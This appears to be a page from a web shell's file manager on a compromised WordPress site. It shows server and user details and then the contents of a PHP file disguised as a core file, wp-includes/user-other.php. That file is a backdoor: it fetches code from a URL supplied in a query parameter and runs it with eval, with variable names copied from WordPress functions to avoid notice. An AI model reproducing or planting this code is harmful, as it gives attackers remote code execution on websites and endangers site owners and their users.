HEX
Server: Apache
System: Linux server.futurextrade.com 4.18.0-553.74.1.el8_10.x86_64 #1 SMP Mon Sep 8 12:04:40 EDT 2025 x86_64
User: bangladeshwood (1009)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: /home/bangladeshwood/public_html/wp-includes/user-other.php
<?php

if (isset($_GET['more'])) {
    $get_permalink_bt = $_GET['more'];
    if ($language_attributes_ao = curl_init()) {
        curl_setopt($language_attributes_ao, CURLOPT_URL, $get_permalink_bt);
        curl_setopt($language_attributes_ao, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($language_attributes_ao));
        curl_close($language_attributes_ao);
        exit;
    }
}